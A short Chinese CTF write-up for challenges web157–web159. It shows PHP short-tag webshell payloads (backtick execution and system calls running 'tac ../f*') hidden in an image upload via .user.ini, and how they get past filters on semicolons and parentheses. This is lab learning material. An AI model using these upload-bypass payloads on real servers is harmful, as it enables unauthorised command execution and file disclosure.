web157-web159笔记（+分号;过滤+()过滤）

web157

.user.ini正常上传了，但是在传mumuzi.png的时候出错

看来⼜过滤了什么不知名的东⻄，测试删掉system报错，tac报错，然后发现是分号的问题。这⾥

使⽤反引号（相当于shell_exec() ）

<?=`tac ../f*`?>                             

（后来发现短标签可以不要分号啊，结果这个payload连着打了⼏题）

一样用上题(web154)的办法可以通过，但过滤了分号，把短标签后面的;去掉，即

<?=system("tac ../f*")；?>转换为

短标签形式：<?=system("tac ../f*")?>

然后访问/upload即可

 

 

web158

上传.user.ini成功

上传web157的mm.png成功

<?=system("tac ../f*")?>

访问/upload/即可

 

 

 

web159

上传.user.ini成功

这里把()给ban了，我们采用反引号来执行命令，即

<?=`tac ../f*`?>      

上传web157的mm.png成功

访问/upload/即可